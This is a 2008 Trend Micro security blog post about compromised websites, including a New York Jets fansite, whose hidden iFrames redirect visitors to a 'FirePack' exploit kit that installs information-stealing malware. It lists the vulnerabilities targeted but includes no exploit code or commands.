Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
  • Email Subscription

  • About Us


    Whoa is my Jets, but not only the team, but one of their fansites, and several other unrelated Web sites, too.

    It leads to a redirect in Estonia, which in turn leads to an exploit server in New York.Go figure.

    Here is yet another example of criminals taking advantage of, and compromising popular Web sites to further their criminal activities.

    There are several Web sites that we have detected which have the exact same embedded iFrame(s) that may surreptitiously download malware to a vulnerable computer, but this one stood out above all others — due to my devotion to the New York Jets, of course.

    Ironically, they’re located in the United States, too.

    A “new” server-side malware toolkit has surfaced called “FirePack”, which is a play on the wording of previous malware-service toolkits (e.g. MPack, IcePack).

    And yes, they actively exploit unwary visitors — or rather, surreptitiously “piped” malicious content via iFrame.

    We’ll post more on FirePack later, but in the meantime, we’re taking measures to secure our customers against these threats.

    In the meantime, don’t visit newyorkfanatic(dot)com.

    More later — watch this space.

    Updated: 4 January 2008, 19:30 PST

    As promised, we’d like to provide a little more information on this nastiness.

    Here’s a basic rundown of the infection chain, as depicted in the image above.

    Users surfing to a compromised website which contain a malicious embedded iFrame (or an obfuscated JavaScript iFrame), set in motion a chain of very unfortunate events.

    First, the iFrame (or an obfuscated JavaScript iFrame) contains a redirect to another Web site hosting FirePack engine infection (we have also seen it loop through an intermediary redirect first), which then checks for the browser being used (MS-IE/Firefox/Opera) by the unwitting user.

    The FirePack kit also hosts a lot of exploits — which include targeting specific vulnerabilities, to include (but not limited to):

    – Vulnerability in Microsoft XML Core Services Allows Remote Code Execution (MS06-071)
    – Yahoo Webcam vulnerability
    – Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability (MS06-13)
    – Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
    – Vulnerability in Vector Markup Language Could Allow Remote Code Execution (MS07-004)
    – Also, an Opera 0day 9.0-9.2 vulnerability released in October 2007!

    If any of the FirePack vulnerabilities are found, this leads to vulnerable users having some very nasty malware downloaded (and executed) to their systems. This malware creates one of the infamous NTOS.exe or WSNPOEM variants in the infected system — and their purpose is but for one reason, and one reason only: information theft.

    Game over.

    The most important note here is one I like to make when the occasion presents itself, and that is why we (Trend Micro) have stepped up our efforts and focus on Web Threat Protection (WTP).

    At the time of initial exploit, some of this new malware can be completely undetectable — and of course, the time-to-implement new detection on the malware itself can be anywhere from hours to days. With our WTP efforts, we can quickly identify threats in The Internet, classify them, and integrate them into our WTP databases, so that our customers are alerted that a Web site they might be surfing is dangerous.

    Let’s be careful out there!

    Paul “Fergie” Ferguson and Ivan Macalintal
    Network Security Intelligence
    Advanced Threats Research

    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon

    Comments are closed.


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice